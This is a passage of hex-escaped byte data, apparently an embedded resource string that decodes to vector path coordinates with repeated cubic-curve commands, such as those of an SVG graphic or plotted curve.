\x32\x39\x32\x20\x39\x2e\x36\x36\x31\x31\x32\x34\x32\x35\x31\x38\
\x35\x20\x43\x20\x36\x2e\x30\x38\x37\x31\x31\x32\x34\x38\x31\x37\
\x35\x20\x39\x2e\x36\x38\x37\x36\x33\x33\x35\x39\x31\x35\x38\x20\
\x36\x2e\x30\x39\x33\x33\x35\x33\x35\x35\x30\x35\x39\x20\x39\x2e\
\x37\x31\x34\x37\x38\x36\x35\x33\x32\x39\x39\x20\x36\x2e\x30\x39\
\x39\x35\x39\x34\x36\x31\x39\x34\x32\x20\x39\x2e\x37\x34\x32\x35\
\x35\x38\x33\x30\x36\x30\x38\x20\x43\x20\x36\x2e\x31\x30\x35\x38\
\x33\x35\x36\x38\x38\x32\x36\x20\x39\x2e\x37\x37\x30\x33\x33\x30\
\x30\x37\x39\x31\x37\x20\x36\x2e\x31\x31\x32\x30\x37\x36\x37\x35\
\x37\x31\x20\x39\x2e\x37\x39\x38\x37\x32\x34\x34\x30\x34\x36\x20\
\x36\x2e\x31\x31\x38\x33\x31\x37\x38\x32\x35\x39\x33\x20\x39\x2e\
\x38\x32\x37\x37\x31\x35\x36\x38\x31\x37\x35\x20\x43\x20\x36\x2e\
\x31\x32\x34\x35\x35\x38\x38\x39\x34\x37\x37\x20\x39\x2e\x38\x35\
\x36\x37\x30\x36\x39\x35\x38\x38\x39\x20\x36\x2e\x31\x33\x30\x37\
\x39\x39\x39\x36\x33\x36\x20\x39\x2e\x38\x38\x36\x32\x39\x38\x37\
\x37\x36\x37\x20\x36\x2e\x31\x33\x37\x30\x34\x31\x30\x33\x32\x34\
\x34\x20\x39\x2e\x39\x31\x36\x34\x36\x34\x37\x34\x33\x35\x20\x43\
\x20\x36\x2e\x31\x34\x33\x32\x38\x32\x31\x30\x31\x32\x38\x20\x39\
\x2e\x39\x34\x36\x36\x33\x30\x37\x31\x30\x33\x20\x36\x2e\x31\x34\
\x39\x35\x32\x33\x31\x37\x30\x31\x31\x20\x39\x2e\x39\x37\x37\x33\
\x37\x34\x32\x37\x37\x37\x39\x20\x36\x2e\x31\x35\x35\x37\x36\x34\
\x32\x33\x38\x39\x35\x20\x31\x30\x2e\x30\x30\x38\x36\x36\x38\x33\
\x30\x34\x20\x43\x20\x36\x2e\x31\x36\x32\x30\x30\x35\x33\x30\x37\
\x37\x38\x20\x31\x30\x2e\x30\x33\x39\x39\x36\x32\x33\x33\x30\x33\
\x20\x36\x2e\x31\x36\x38\x32\x34\x36\x33\x37\x36\x36\x32\x20\x31\
\x30\x2e\x30\x37\x31\x38\x31\x30\x31\x32\x34\x33\x20\x36\x2e\x31\
\x37\x34\x34\x38\x37\x34\x34\x35\x34\x36\x20\x31\x30\x2e\x31\x30\
\x34\x31\x38\x33\x38\x33\x36\x20\x43\x20\x36\x2e\x31\x38\x30\x37\
\x32\x38\x35\x31\x34\x32\x39\x20\x31\x30\x2e\x31\x33\x36\x35\x35\
\x37\x35\x34\x37\x37\x20\x36\x2e\x31\x38\x36\x39\x36\x39\x35\x38\
\x33\x31\x33\x20\x31\x30\x2e\x31\x36\x39\x34\x36\x30\x33\x33\x38\
\x35\x20\x36\x2e\x31\x39\x33\x32\x31\x30\x36\x35\x31\x39\x36\x20\
\x31\x30\x2e\x32\x30\x32\x38\x36\x33\x36\x39\x32\x37\x20\x43\x20\
\x36\x2e\x31\x39\x39\x34\x35\x31\x37\x32\x30\x38\x20\x31\x30\x2e\
\x32\x33\x36\x32\x36\x37\x30\x34\x36\x39\x20\x36\x2e\x32\x30\x35\
\x36\x39\x32\x37\x38\x39\x36\x34\x20\x31\x30\x2e\x32\x37\x30\x31\
\x37\x33\x39\x37\x33\x35\x20\x36\x2e\x32\x31\x31\x39\x33\x33\x38\
\x35\x38\x34\x37\x20\x31\x30\x2e\x33\x30\x34\x35\x35\x35\x33\x33\
\x35\x38\x20\x43\x20\x36\x2e\x32\x31\x38\x31\x37\x34\x39\x32\x37\
\x33\x31\x20\x31\x30\x2e\x33\x33\x38\x39\x33\x36\x36\x39\x38\x20\
\x36\x2e\x32\x32\x34\x34\x31\x35\x39\x39\x36\x31\x35\x20\x31\x30\
\x2e\x33\x37\x33\x37\x39\x35\x33\x34\x37\x35\x20\x36\x2e\x32\x33\
\x30\x36\x35\x37\x30\x36\x34\x39\x38\x20\x31\x30\x2e\x34\x30\x39\
\x31\x30\x31\x35\x37\x31\x34\x20\x43\x20\x36\x2e\x32\x33\x36\x38\
\x39\x38\x31\x33\x33\x38\x32\x20\x31\x30\x2e\x34\x34\x34\x34\x30\
\x37\x37\x39\x35\x33\x20\x36\x2e\x32\x34\x33\x31\x33\x39\x32\x30\
\x32\x36\x35\x20\x31\x30\x2e\x34\x38\x30\x31\x36\x34\x32\x38\x33\
\x35\x20\x36\x2e\x32\x34\x39\x33\x38\x30\x32\x37\x31\x34\x39\x20\
\x31\x30\x2e\x35\x31\x36\x33\x34\x30\x37\x39\x33\x31\x20\x43\x20\
\x36\x2e\x32\x35\x35\x36\x32\x31\x33\x34\x30\x33\x33\x20\x31\x30\
\x2e\x35\x35\x32\x35\x31\x37\x33\x30\x32\x37\x20\x36\x2e\x32\x36\
\x31\x38\x36\x32\x34\x30\x39\x31\x36\x20\x31\x30\x2e\x35\x38\x39\
\x31\x31\x36\x33\x35\x37\x38\x20\x36\x2e\x32\x36\x38\x31\x30\x33\
\x34\x37\x38\x20\x31\x30\x2e\x36\x32\x36\x31\x30\x37\x32\x33\x31\
\x38\x20\x43\x20\x36\x2e\x32\x37\x34\x33\x34\x34\x35\x34\x36\x38\
\x33\x20\x31\x30\x2e\x36\x36\x33\x30\x39\x38\x31\x30\x35\x38\x20\
\x36\x2e\x32\x38\x30\x35\x38\x35\x36\x31\x35\x36\x37\x20\x31\x30\
\x2e\x37\x30\x30\x34\x38\x33\x31\x35\x33\x32\x20\x36\x2e\x32\x38\
\x36\x38\x32\x36\x36\x38\x34\x35\x31\x20\x31\x30\x2e\x37\x33\x38\
\x32\x33\x31\x32\x31\x31\x36\x20\x43\x20\x36\x2e\x32\x39\x33\x30\
\x36\x37\x37\x35\x33\x33\x34\x20\x31\x30\x2e\x37\x37\x35\x39\x37\
\x39\x32\x37\x20\x36\x2e\x32\x39\x39\x33\x30\x38\x38\x32\x32\x31\
\x38\x20\x31\x30\x2e\x38\x31\x34\x30\x39\x32\x35\x32\x30\x34\x20\
\x36\x2e\x33\x30\x35\x35\x34\x39\x38\x39\x31\x30\x31\x20\x31\x30\
\x2e\x38\x35\x32\x35\x33\x39\x34\x31\x32\x35\x20\x43\x20\x36\x2e\
\x33\x31\x31\x37\x39\x30\x39\x35\x39\x38\x35\x20\x31\x30\x2e\x38\
\x39\x30\x39\x38\x36\x33\x30\x34\x37\x20\x36\x2e\x33\x31\x38\x30\
\x33\x32\x30\x32\x38\x36\x39\x20\x31\x30\x2e\x39\x32\x39\x37\x36\
\x38\x38\x34\x33\x20\x36\x2e\x33\x32\x34\x32\x37\x33\x30\x39\x37\
\x35\x32\x20\x31\x30\x2e\x39\x36\x38\x38\x35\x35\x31\x33\x38\x33\
\x20\x43\x20\x36\x2e\x33\x33\x30\x35\x31\x34\x31\x36\x36\x33\x36\
\x20\x31\x31\x2e\x30\x30\x37\x39\x34\x31\x34\x33\x33\x35\x20\x36\
\x2e\x33\x33\x36\x37\x35\x35\x32\x33\x35\x31\x39\x20\x31\x31\x2e\
\x30\x34\x37\x33\x33\x33\x33\x31\x30\x31\x20\x36\x2e\x33\x34\x32\
\x39\x39\x36\x33\x30\x34\x30\x33\x20\x31\x31\x2e\x30\x38\x36\x39\
\x39\x38\x35\x38\x39\x31\x20\x43\x20\x36\x2e\x33\x34\x39\x32\x33\
\x37\x33\x37\x32\x38\x37\x20\x31\x31\x2e\x31\x32\x36\x36\x36\x33\
\x38\x36\x38\x32\x20\x36\x2e\x33\x35\x35\x34\x37\x38\x34\x34\x31\
\x37\x20\x31\x31\x2e\x31\x36\x36\x36\x30\x34\x31\x39\x31\x36\x20\
\x36\x2e\x33\x36\x31\x37\x31\x39\x35\x31\x30\x35\x34\x20\x31\x31\
\x2e\x32\x30\x36\x37\x38\x37\x31\x34\x30\x34\x20\x43\x20\x36\x2e\
\x33\x36\x37\x39\x36\x30\x35\x37\x39\x33\x37\x20\x31\x31\x2e\x32\
\x34\x36\x39\x37\x30\x30\x38\x39\x31\x20\x36\x2e\x33\x37\x34\x32\
\x30\x31\x36\x34\x38\x32\x31\x20\x31\x31\x2e\x32\x38\x37\x33\x39\
\x37\x31\x31\x39\x39\x20\x36\x2e\x33\x38\x30\x34\x34\x32\x37\x31\
\x37\x30\x35\x20\x31\x31\x2e\x33\x32\x38\x30\x33\x35\x36\x32\x34\
\x31\x20\x43\x20\x36\x2e\x33\x38\x36\x36\x38\x33\x37\x38\x35\x38\
\x38\x20\x31\x31\x2e\x33\x36\x38\x36\x37\x34\x31\x32\x38\x32\x20\
\x36\x2e\x33\x39\x32\x39\x32\x34\x38\x35\x34\x37\x32\x20\x31\x31\
\x2e\x34\x30\x39\x35\x32\x35\x33\x37\x34\x38\x20\x36\x2e\x33\x39\
\x39\x31\x36\x35\x39\x32\x33\x35\x35\x20\x31\x31\x2e\x34\x35\x30\
\x35\x35\x36\x36\x31\x35\x37\x20\x43\x20\x36\x2e\x34\x30\x35\x34\
\x30\x36\x39\x39\x32\x33\x39\x20\x31\x31\x2e\x34\x39\x31\x35\x38\
\x37\x38\x35\x36\x36\x20\x36\x2e\x34\x31\x31\x36\x34\x38\x30\x36\
\x31\x32\x33\x20\x31\x31\x2e\x35\x33\x32\x38\x30\x30\x31\x37\x31\
\x35\x20\x36\x2e\x34\x31\x37\x38\x38\x39\x31\x33\x30\x30\x36\x20\
\x31\x31\x2e\x35\x37\x34\x31\x36\x30\x37\x32\x33\x36\x20\x43\x20\
\x36\x2e\x34\x32\x34\x31\x33\x30\x31\x39\x38\x39\x20\x31\x31\x2e\
\x36\x31\x35\x35\x32\x31\x32\x37\x35\x36\x20\x36\x2e\x34\x33\x30\
\x33\x37\x31\x32\x36\x37\x37\x33\x20\x31\x31\x2e\x36\x35\x37\x30\
\x33\x30\x39\x35\x33\x34\x20\x36\x2e\x34\x33\x36\x36\x31\x32\x33\
\x33\x36\x35\x37\x20\x31\x31\x2e\x36\x39\x38\x36\x35\x36\x38\x38\
\x31\x39\x20\x43\x20\x36\x2e\x34\x34\x32\x38\x35\x33\x34\x30\x35\
\x34\x31\x20\x31\x31\x2e\x37\x34\x30\x32\x38\x32\x38\x31\x30\x34\
\x20\x36\x2e\x34\x34\x39\x30\x39\x34\x34\x37\x34\x32\x34\x20\x31\
\x31\x2e\x37\x38\x32\x30\x32\x35\x36\x38\x35\x38\x20\x36\x2e\x34\
\x35\x35\x33\x33\x35\x35\x34\x33\x30\x38\x20\x31\x31\x2e\x38\x32\
\x33\x38\x35\x32\x36\x34\x35\x38\x20\x43\x20\x36\x2e\x34\x36\x31\
\x35\x37\x36\x36\x31\x31\x39\x31\x20\x31\x31\x2e\x38\x36\x35\x36\
\x37\x39\x36\x30\x35\x39\x20\x36\x2e\x34\x36\x37\x38\x31\x37\x36\
\x38\x30\x37\x35\x20\x31\x31\x2e\x39\x30\x37\x35\x39\x31\x31\x35\
\x33\x32\x20\x36\x2e\x34\x37\x34\x30\x35\x38\x37\x34\x39\x35\x39\
\x20\x31\x31\x2e\x39\x34\x39\x35\x35\x34\x34\x38\x39\x32\x20\x43\
\x20\x36\x2e\x34\x38\x30\x32\x39\x39\x38\x31\x38\x34\x32\x20\x31\
\x31\x2e\x39\x39\x31\x35\x31\x37\x38\x32\x35\x31\x20\x36\x2e\x34\
\x38\x36\x35\x34\x30\x38\x38\x37\x32\x36\x20\x31\x32\x2e\x30\x33\
\x33\x35\x33\x33\x32\x35\x38\x20\x36\x2e\x34\x39\x32\x37\x38\x31\
\x39\x35\x36\x31\x20\x31\x32\x2e\x30\x37\x35\x35\x36\x38\x31\x30\
\x33\x33\x20\x43\x20\x36\x2e\x34\x39\x39\x30\x32\x33\x30\x32\x34\
\x39\x33\x20\x31\x32\x2e\x31\x31\x37\x36\x30\x32\x39\x34\x38\x36\
\x20\x36\x2e\x35\x30\x35\x32\x36\x34\x30\x39\x33\x37\x37\x20\x31\
\x32\x2e\x31\x35\x39\x36\x35\x37\x33\x32\x30\x31\x20\x36\x2e\x35\
\x31\x31\x35\x30\x35\x31\x36\x32\x36\x20\x31\x32\x2e\x32\x30\x31\
\x36\x39\x38\x36\x39\x37\x38\x20\x43\x20\x36\x2e\x35\x31\x37\x37\
\x34\x36\x32\x33\x31\x34\x34\x20\x31\x32\x2e\x32\x34\x33\x37\x34\
\x30\x30\x37\x35\x36\x20\x36\x2e\x35\x32\x33\x39\x38\x37\x33\x30\
\x30\x32\x38\x20\x31\x32\x2e\x32\x38\x35\x37\x36\x38\x33\x37\x38\
\x34\x20\x36\x2e\x35\x33\x30\x32\x32\x38\x33\x36\x39\x31\x31\x20\
\x31\x32\x2e\x33\x32\x37\x37\x35\x31\x33\x30\x31\x34\x20\x43\x20\
\x36\x2e\x35\x33\x36\x34\x36\x39\x34\x33\x37\x39\x35\x20\x31\x32\
\x2e\x33\x36\x39\x37\x33\x34\x32\x32\x34\x35\x20\x36\x2e\x35\x34\
\x32\x37\x31\x30\x35\x30\x36\x37\x38\x20\x31\x32\x2e\x34\x31\x31\
\x36\x37\x31\x34\x39\x31\x37\x20\x36\x2e\x35\x34\x38\x39\x35\x31\
\x35\x37\x35\x36\x32\x20\x31\x32\x2e\x34\x35\x33\x35\x33\x31\x30\
\x36\x33\x33\x20\x43\x20\x36\x2e\x35\x35\x35\x31\x39\x32\x36\x34\
\x34\x34\x36\x20\x31\x32\x2e\x34\x39\x35\x33\x39\x30\x36\x33\x35\
\x20\x36\x2e\x35\x36\x31\x34\x33\x33\x37\x31\x33\x32\x39\x20\x31\
\x32\x2e\x35\x33\x37\x31\x37\x32\x30\x34\x30\x35\x20\x36\x2e\x35\
\x36\x37\x36\x37\x34\x37\x38\x32\x31\x33\x20\x31\x32\x2e\x35\x37\
\x38\x38\x34\x33\x35\x35\x34\x36\x20\x43\x20\x36\x2e\x35\x37\x33\
\x39\x31\x35\x38\x35\x30\x39\x36\x20\x31\x32\x2e\x36\x32\x30\x35\
\x31\x35\x30\x36\x38\x37\x20\x36\x2e\x35\x38\x30\x31\x35\x36\x39\
\x31\x39\x38\x20\x31\x32\x2e\x36\x36\x32\x30\x37\x36\x30\x32\x37\
\x33\x20\x36\x2e\x35\x38\x36\x33\x39\x37\x39\x38\x38\x36\x34\x20\
\x31\x32\x2e\x37\x30\x33\x34\x39\x35\x30\x36\x38\x35\x20\x43\x20\
\x36\x2e\x35\x39\x32\x36\x33\x39\x30\x35\x37\x34\x37\x20\x31\x32\
\x2e\x37\x34\x34\x39\x31\x34\x31\x30\x39\x38\x20\x36\x2e\x35\x39\
\x38\x38\x38\x30\x31\x32\x36\x33\x31\x20\x31\x32\x2e\x37\x38\x36\
\x31\x39\x30\x33\x37\x36\x39\x20\x36\x2e\x36\x30\x35\x31\x32\x31\
\x31\x39\x35\x31\x34\x20\x31\x32\x2e\x38\x32\x37\x32\x39\x32\x39\
\x32\x30\x32\x20\x43\x20\x36\x2e\x36\x31\x31\x33\x36\x32\x32\x36\
\x33\x39\x38\x20\x31\x32\x2e\x38\x36\x38\x33\x39\x35\x34\x36\x33\
\x35\x20\x36\x2e\x36\x31\x37\x36\x30\x33\x33\x33\x32\x38\x32\x20\
\x31\x32\x2e\x39\x30\x39\x33\x32\x33\x32\x33\x34\x38\x20\x36\x2e\
\x36\x32\x33\x38\x34\x34\x34\x30\x31\x36\x35\x20\x31\x32\x2e\x39\
\x35\x30\x30\x34\x35\x37\x34\x34\x32\x20\x43\x20\x36\x2e\x36\x33\
\x30\x30\x38\x35\x34\x37\x30\x34\x39\x20\x31\x32\x2e\x39\x39\x30\
\x37\x36\x38\x32\x35\x33\x36\x20\x36\x2e\x36\x33\x36\x33\x32\x36\
\x35\x33\x39\x33\x32\x20\x31\x33\x2e\x30\x33\x31\x32\x38\x34\x32\
\x36\x33\x34\x20\x36\x2e\x36\x34\x32\x35\x36\x37\x36\x30\x38\x31\
\x36\x20\x31\x33\x2e\x30\x37\x31\x35\x36\x33\x37\x39\x30\x36\x20\
\x43\x20\x36\x2e\x36\x34\x38\x38\x30\x38\x36\x37\x37\x20\x31\x33\
\x2e\x31\x31\x31\x38\x34\x33\x33\x31\x37\x38\x20\x36\x2e\x36\x35\
\x35\x30\x34\x39\x37\x34\x35\x38\x33\x20\x31\x33\x2e\x31\x35\x31\
\x38\x38\x34\x39\x33\x36\x38\x20\x36\x2e\x36\x36\x31\x32\x39\x30\
\x38\x31\x34\x36\x37\x20\x31\x33\x2e\x31\x39\x31\x36\x35\x39\x32\
\x31\x38\x31\x20\x43\x20\x36\x2e\x36\x36\x37\x35\x33\x31\x38\x38\
\x33\x35\x20\x31\x33\x2e\x32\x33\x31\x34\x33\x33\x34\x39\x39\x34\
\x20\x36\x2e\x36\x37\x33\x37\x37\x32\x39\x35\x32\x33\x34\x20\x31\
\x33\x2e\x32\x37\x30\x39\x33\x38\x38\x33\x31\x38\x20\x36\x2e\x36\
\x38\x30\x30\x31\x34\x30\x32\x31\x31\x38\x20\x31\x33\x2e\x33\x31\
\x30\x31\x34\x36\x33\x38\x34\x35\x20\x43\x20\x36\x2e\x36\x38\x36\
\x32\x35\x35\x30\x39\x30\x30\x31\x20\x31\x33\x2e\x33\x34\x39\x33\
\x35\x33\x39\x33\x37\x32\x20\x36\x2e\x36\x39\x32\x34\x39\x36\x31\
\x35\x38\x38\x35\x20\x31\x33\x2e\x33\x38\x38\x32\x36\x31\x39\x31\
\x36\x31\x20\x36\x2e\x36\x39\x38\x37\x33\x37\x32\x32\x37\x36\x38\
\x20\x31\x33\x2e\x34\x32\x36\x38\x34\x32\x31\x33\x33\x36\x20\x43\
\x20\x36\x2e\x37\x30\x34\x39\x37\x38\x32\x39\x36\x35\x32\x20\x31\
\x33\x2e\x34\x36\x35\x34\x32\x32\x33\x35\x31\x32\x20\x36\x2e\x37\
\x31\x31\x32\x31\x39\x33\x36\x35\x33\x36\x20\x31\x33\x2e\x35\x30\
\x33\x36\x37\x32\x38\x33\x33\x20\x36\x2e\x37\x31\x37\x34\x36\x30\
\x34\x33\x34\x31\x39\x20\x31\x33\x2e\x35\x34\x31\x35\x36\x36\x30\
\x37\x38\x35\x20\x43\x20\x36\x2e\x37\x32\x33\x37\x30\x31\x35\x30\
\x33\x30\x33\x20\x31\x33\x2e\x35\x37\x39\x34\x35\x39\x33\x32\x34\
\x31\x20\x36\x2e\x37\x32\x39\x39\x34\x32\x35\x37\x31\x38\x36\x20\
\x31\x33\x2e\x36\x31\x36\x39\x39\x33\x31\x38\x31\x36\x20\x36\x2e\
\x37\x33\x36\x31\x38\x33\x36\x34\x30\x37\x20\x31\x33\x2e\x36\x35\
\x34\x31\x34\x30\x38\x38\x30\x31\x20\x43\x20\x36\x2e\x37\x34\x32\
\x34\x32\x34\x37\x30\x39\x35\x34\x20\x31\x33\x2e\x36\x39\x31\x32\
\x38\x38\x35\x37\x38\x36\x20\x36\x2e\x37\x34\x38\x36\x36\x35\x37\
\x37\x38\x33\x37\x20\x31\x33\x2e\x37\x32\x38\x30\x34\x37\x37\x39\
\x32\x35\x20\x36\x2e\x37\x35\x34\x39\x30\x36\x38\x34\x37\x32\x31\
\x20\x31\x33\x2e\x37\x36\x34\x33\x39\x32\x35\x32\x31\x35\x20\x43\
\x20\x36\x2e\x37\x36\x31\x31\x34\x37\x39\x31\x36\x30\x35\x20\x31\
\x33\x2e\x38\x30\x30\x37\x33\x37\x32\x35\x30\x35\x20\x36\x2e\x37\
\x36\x37\x33\x38\x38\x39\x38\x34\x38\x38\x20\x31\x33\x2e\x38\x33\
\x36\x36\x36\x34\x39\x39\x38\x37\x20\x36\x2e\x37\x37\x33\x36\x33\
\x30\x30\x35\x33\x37\x32\x20\x31\x33\x2e\x38\x37\x32\x31\x35\x30\
\x35\x37\x36\x39\x20\x43\x20\x36\x2e\x37\x37\x39\x38\x37\x31\x31\
\x32\x32\x35\x35\x20\x31\x33\x2e\x39\x30\x37\x36\x33\x36\x31\x35\
\x35\x31\x20\x36\x2e\x37\x38\x36\x31\x31\x32\x31\x39\x31\x33\x39\
\x20\x31\x33\x2e\x39\x34\x32\x36\x37\x36\x39\x30\x30\x39\x20\x36\
\x2e\x37\x39\x32\x33\x35\x33\x32\x36\x30\x32\x33\x20\x31\x33\x2e\
\x39\x37\x37\x32\x34\x38\x34\x37\x35\x31\x20\x43\x20\x36\x2e\x37\
\x39\x38\x35\x39\x34\x33\x32\x39\x30\x36\x20\x31\x34\x2e\x30\x31\
\x31\x38\x32\x30\x30\x34\x39\x33\x20\x36\x2e\x38\x30\x34\x38\x33\
\x35\x33\x39\x37\x39\x20\x31\x34\x2e\x30\x34\x35\x39\x31\x39\x36\
\x32\x37\x31\x20\x36\x2e\x38\x31\x31\x30\x37\x36\x34\x36\x36\x37\
\x33\x20\x31\x34\x2e\x30\x37\x39\x35\x32\x33\x37\x35\x36\x39\x20\
\x43\x20\x36\x2e\x38\x31\x37\x33\x31\x37\x35\x33\x35\x35\x37\x20\
\x31\x34\x2e\x31\x31\x33\x31\x32\x37\x38\x38\x36\x38\x20\x36\x2e\
\x38\x32\x33\x35\x35\x38\x36\x30\x34\x34\x31\x20\x31\x34\x2e\x31\
\x34\x36\x32\x33\x33\x35\x38\x35\x38\x20\x36\x2e\x38\x32\x39\x37\
\x39\x39\x36\x37\x33\x32\x34\x20\x31\x34\x2e\x31\x37\x38\x38\x31\
\x38\x33\x32\x36\x33\x20\x43\x20\x36\x2e\x38\x33\x36\x30\x34\x30\
\x37\x34\x32\x30\x38\x20\x31\x34\x2e\x32\x31\x31\x34\x30\x33\x30\
\x36\x36\x39\x20\x36\x2e\x38\x34\x32\x32\x38\x31\x38\x31\x30\x39\
\x31\x20\x31\x34\x2e\x32\x34\x33\x34\x36\x33\x37\x31\x32\x37\x20\
\x36\x2e\x38\x34\x38\x35\x32\x32\x38\x37\x39\x37\x35\x20\x31\x34\
\x2e\x32\x37\x34\x39\x37\x38\x36\x39\x34\x39\x20\x43\x20\x36\x2e\
\x38\x35\x34\x37\x36\x33\x39\x34\x38\x35\x39\x20\x31\x34\x2e\x33\
\x30\x36\x34\x39\x33\x36\x37\x37\x31\x20\x36\x2e\x38\x36\x31\x30\
\x30\x35\x30\x31\x37\x34\x32\x20\x31\x34\x2e\x33\x33\x37\x34\x35\
\x39\x37\x31\x30\x37\x20\x36\x2e\x38\x36\x37\x32\x34\x36\x30\x38\
\x36\x32\x36\x20\x31\x34\x2e\x33\x36\x37\x38\x35\x36\x32\x31\x38\
\x39\x20\x43\x20\x36\x2e\x38\x37\x33\x34\x38\x37\x31\x35\x35\x30\
\x39\x20\x31\x34\x2e\x33\x39\x38\x32\x35\x32\x37\x32\x37\x32\x20\
\x36\x2e\x38\x37\x39\x37\x32\x38\x32\x32\x33\x39\x33\x20\x31\x34\
\x2e\x34\x32\x38\x30\x37\x36\x32\x38\x31\x37\x20\x36\x2e\x38\x38\
\x35\x39\x36\x39\x32\x39\x32\x37\x37\x20\x31\x34\x2e\x34\x35\x37\
\x33\x30\x37\x33\x32\x39\x34\x20\x43\x20\x36\x2e\x38\x39\x32\x32\
\x31\x30\x33\x36\x31\x36\x20\x31\x34\x2e\x34\x38\x36\x35\x33\x38\
\x33\x37\x37\x32\x20\x36\x2e\x38\x39\x38\x34\x35\x31\x34\x33\x30\
\x34\x34\x20\x31\x34\x2e\x35\x31\x35\x31\x37\x33\x33\x35\x31\x36\
\x20\x36\x2e\x39\x30\x34\x36\x39\x32\x34\x39\x39\x32\x37\x20\x31\
\x34\x2e\x35\x34\x33\x31\x39\x33\x37\x35\x33\x38\x20\x43\x20\x36\
\x2e\x39\x31\x30\x39\x33\x33\x35\x36\x38\x31\x31\x20\x31\x34\x2e\
\x35\x37\x31\x32\x31\x34\x31\x35\x36\x20\x36\x2e\x39\x31\x37\x31\
\x37\x34\x36\x33\x36\x39\x35\x20\x31\x34\x2e\x35\x39\x38\x36\x31\
\x36\x32\x38\x36\x37\x20\x36\x2e\x39\x32\x33\x34\x31\x35\x37\x30\
\x35\x37\x38\x20\x31\x34\x2e\x36\x32\x35\x33\x38\x32\x37\x32\x39\
\x37\x20\x43\x20\x36\x2e\x39\x32\x39\x36\x35\x36\x37\x37\x34\x36\
\x32\x20\x31\x34\x2e\x36\x35\x32\x31\x34\x39\x31\x37\x32\x37\x20\
\x36\x2e\x39\x33\x35\x38\x39\x37\x38\x34\x33\x34\x35\x20\x31\x34\
\x2e\x36\x37\x38\x32\x37\x36\x31\x30\x31\x39\x20\x36\x2e\x39\x34\
\x32\x31\x33\x38\x39\x31\x32\x32\x39\x20\x31\x34\x2e\x37\x30\x33\
\x37\x34\x37\x32\x31\x30\x34\x20\x43\x20\x36\x2e\x39\x34\x38\x33\
\x37\x39\x39\x38\x31\x31\x33\x20\x31\x34\x2e\x37\x32\x39\x32\x31\
\x38\x33\x31\x39\x20\x36\x2e\x39\x35\x34\x36\x32\x31\x30\x34\x39\
\x39\x36\x20\x31\x34\x2e\x37\x35\x34\x30\x32\x39\x36\x35\x39\x38\
\x20\x36\x2e\x39\x36\x30\x38\x36\x32\x31\x31\x38\x38\x20\x31\x34\
\x2e\x37\x37\x38\x31\x36\x36\x30\x36\x30\x39\x20\x43\x20\x36\x2e\
\x39\x36\x37\x31\x30\x33\x31\x38\x37\x36\x33\x20\x31\x34\x2e\x38\
\x30\x32\x33\x30\x32\x34\x36\x32\x31\x20\x36\x2e\x39\x37\x33\x33\
\x34\x34\x32\x35\x36\x34\x37\x20\x31\x34\x2e\x38\x32\x35\x37\x35\
\x39\x38\x36\x31\x35\x20\x36\x2e\x39\x37\x39\x35\x38\x35\x33\x32\
\x35\x33\x31\x20\x31\x34\x2e\x38\x34\x38\x35\x32\x34\x32\x34\x35\
\x34\x20\x43\x20\x36\x2e\x39\x38\x35\x38\x32\x36\x33\x39\x34\x31\
\x34\x20\x31\x34\x2e\x38\x37\x31\x32\x38\x38\x36\x32\x39\x33\x20\
\x36\x2e\x39\x39\x32\x30\x36\x37\x34\x36\x32\x39\x38\x20\x31\x34\
\x2e\x38\x39\x33\x33\x35\x35\x38\x32\x37\x31\x20\x36\x2e\x39\x39\
\x38\x33\x30\x38\x35\x33\x31\x38\x31\x20\x31\x34\x2e\x39\x31\x34\
\x37\x31\x33\x30\x30\x34\x39\x20\x43\x20\x37\x2e\x30\x30\x34\x35\
\x34\x39\x36\x30\x30\x36\x35\x20\x31\x34\x2e\x39\x33\x36\x30\x37\
\x30\x31\x38\x32\x37\x20\x37\x2e\x30\x31\x30\x37\x39\x30\x36\x36\
\x39\x34\x39\x20\x31\x34\x2e\x39\x35\x36\x37\x31\x33\x30\x36\x37\
\x36\x20\x37\x2e\x30\x31\x37\x30\x33\x31\x37\x33\x38\x33\x32\x20\
\x31\x34\x2e\x39\x37\x36\x36\x33\x30\x30\x32\x35\x36\x20\x43\x20\
\x37\x2e\x30\x32\x33\x32\x37\x32\x38\x30\x37\x31\x36\x20\x31\x34\
\x2e\x39\x39\x36\x35\x34\x36\x39\x38\x33\x36\x20\x37\x2e\x30\x32\
\x39\x35\x31\x33\x38\x37\x36\x20\x31\x35\x2e\x30\x31\x35\x37\x33\
\x33\x36\x34\x36\x31\x20\x37\x2e\x30\x33\x35\x37\x35\x34\x39\x34\
\x34\x38\x33\x20\x31\x35\x2e\x30\x33\x34\x31\x37\x39\x35\x39\x36\
\x38\x20\x43\x20\x37\x2e\x30\x34\x31\x39\x39\x36\x30\x31\x33\x36\
\x37\x20\x31\x35\x2e\x30\x35\x32\x36\x32\x35\x35\x34\x37\x35\x20\
\x37\x2e\x30\x34\x38\x32\x33\x37\x30\x38\x32\x35\x20\x31\x35\x2e\
\x30\x37\x30\x33\x32\x36\x33\x32\x39\x31\x20\x37\x2e\x30\x35\x34\
\x34\x37\x38\x31\x35\x31\x33\x34\x20\x31\x35\x2e\x30\x38\x37\x32\
\x37\x32\x37\x35\x39\x31\x20\x43\x20\x37\x2e\x30\x36\x30\x37\x31\
\x39\x32\x32\x30\x31\x38\x20\x31\x35\x2e\x31\x30\x34\x32\x31\x39\
\x31\x38\x39\x20\x37\x2e\x30\x36\x36\x39\x36\x30\x32\x38\x39\x30\
\x31\x20\x31\x35\x2e\x31\x32\x30\x34\x30\x36\x37\x32\x38\x20\x37\
\x2e\x30\x37\x33\x32\x30\x31\x33\x35\x37\x38\x35\x20\x31\x35\x2e\
\x31\x33\x35\x38\x32\x37\x34\x34\x31\x35\x20\x43\x20\x37\x2e\x30\
\x37\x39\x34\x34\x32\x34\x32\x36\x36\x38\x20\x31\x35\x2e\x31\x35\
\x31\x32\x34\x38\x31\x35\x35\x20\x37\x2e\x30\x38\x35\x36\x38\x33\
\x34\x39\x35\x35\x32\x20\x31\x35\x2e\x31\x36\x35\x38\x39\x37\x34\
\x32\x38\x39\x20\x37\x2e\x30\x39\x31\x39\x32\x34\x35\x36\x34\x33\
\x36\x20\x31\x35\x2e\x31\x37\x39\x37\x36\x38\x35\x38\x38\x38\x20\
\x43\x20\x37\x2e\x30\x39\x38\x31\x36\x35\x36\x33\x33\x31\x39\x20\
\x31\x35\x2e\x31\x39\x33\x36\x33\x39\x37\x34\x38\x38\x20\x37\x2e\
\x31\x30\x34\x34\x30\x36\x37\x30\x32\x30\x33\x20\x31\x35\x2e\x32\
\x30\x36\x37\x32\x38\x31\x31\x32\x39\x20\x37\x2e\x31\x31\x30\x36\
